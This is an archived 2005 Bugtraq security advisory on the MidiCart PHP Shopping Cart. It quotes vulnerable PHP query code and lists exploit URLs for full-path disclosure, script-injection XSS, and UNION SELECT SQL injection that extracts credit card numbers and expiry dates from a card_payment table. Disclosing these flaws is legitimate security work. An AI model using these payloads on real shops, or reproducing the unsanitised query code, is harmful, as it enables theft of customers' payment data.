[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: [hackgen-2005-#004] - Multiple bugs in MidiCart PHP Shopping Cart
From: Exoduks <exoduks () gmail ! com>
Date: 2005-05-05 17:01:34
Message-ID: 20050505170134.18885.qmail () www ! securityfocus ! com
[Download RAW message or body]
http://www.hackgen.org/advisories/hackgen-2005-004.txt
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' [hackgen-2005-#004] '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Multiple bugs in MidiCart PHP Shopping Cart '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Software: MidiCart PHP Shopping Cart
Homepage: http://www.midicart.com/
Author: "Exoduks" - HackGen Team
Release Date: 5 May, 2005
Website: www.hackgen.org
Mail: exoduks [at] gmail . com
0x01 - Affected software description:
-------------------------------------
MidiCart is a Try-Before-You-Buy Shopping Cart Software, that provides all you need \
to create, operate, and maintain a professional Internet shop. MidiCart ASP and PHP \
Shopping Cart is extremely easy to use, flexible, powerful and affordable \
e-commerce solution for your web site.
0x02 - Vulnerability Discription:
---------------------------------
There are several vulnarabilities in midicart. First there are some full-path \
disclosure bugs because of some undefined variable and if php.ini is set to \
display_errors = on we will see full path of the script. Second vulnerability is \
xss in item_list.php and search_list.php file which doesn't have any checking of \
input string so it is possible to inject some evil code and execute through the \
browser. Third bug is a sql injection also in search_list.php, item_list.php and \
item_show.php file also because there isn't any filtering and checking of input \
string which will be executed in mysql command so with special crafted sql command \
we can get some sensitve information from database.
0x03 - Vulnerability Code:
--------------------------
Code vulnarable to sql injectio in search_list.php file
...
// database query to select the categories
$result = mysql_query("select * from products WHERE $chose LIKE '%$searchstring%' \
ORDER BY 'maingroup','secondgroup','code_no' LIMIT 0, 100 ") ;
...
Code vulnarable to sql injectio in item_show.php file
// query to get the products of type $category
$result = mysql_query("select * from products where(code_no = '$code_no') ORDER BY \
'item'");
0x04 - How to fix this bug:
---------------------------
Vendor has beed contacted and he we probably publish new version of this shopping \
cart so go to http://www.midicart.com/ and look for new version.
0x05 - Exploit:
----------------
Full-path disclosure !
-----------------------
http://site.com/shop/search_list.php
http://site.com/shop/item_list.php
http://site.com/shop/item_show.php
XSS !
------
http://site.com/shop/search_list.php?chose=item&searchstring=%3Cscri \
pt%3Ealert('Lamed%20!');%3C/script%3E \
http://site.com/shop/item_list.php?secondgroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E
http://site.com/shop/item_list.php?maingroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E
SQL injection !
----------------
http://site.com/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, \
null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, \
null, null, null, null, null, null, null, null, null, null, null, null, null, null, \
null FROM card_payment /*
http://site.com/shop/item_list.php?maingroup=-99 'UNION SELECT null, null, \
CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, \
null, null, null, null, null, null, null, null, null, null, null, null, null, null \
FROM card_payment /*
http://site.com/shop/item_list.php?secondgroup=-99 'UNION SELECT null, null, \
CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, \
null, null, null, null, null, null, null, null, null, null, null, null, null, null \
FROM card_payment /*
http://site.com/shop/item_show.php?code_no=99 ') UNION SELECT null, null, \
CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, \
null, null, null, null, null, null, null, null, null, null, null, null, null, null \
FROM card_payment /*
* works with magic_quotes_gpc set to Off in php.ini file
0x006 - The End:
----------------
And we are at the end again. Grejtttzz to blackhat.headcoders.net
______________________________________
Written By Exoduks - www.hackgen.org
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic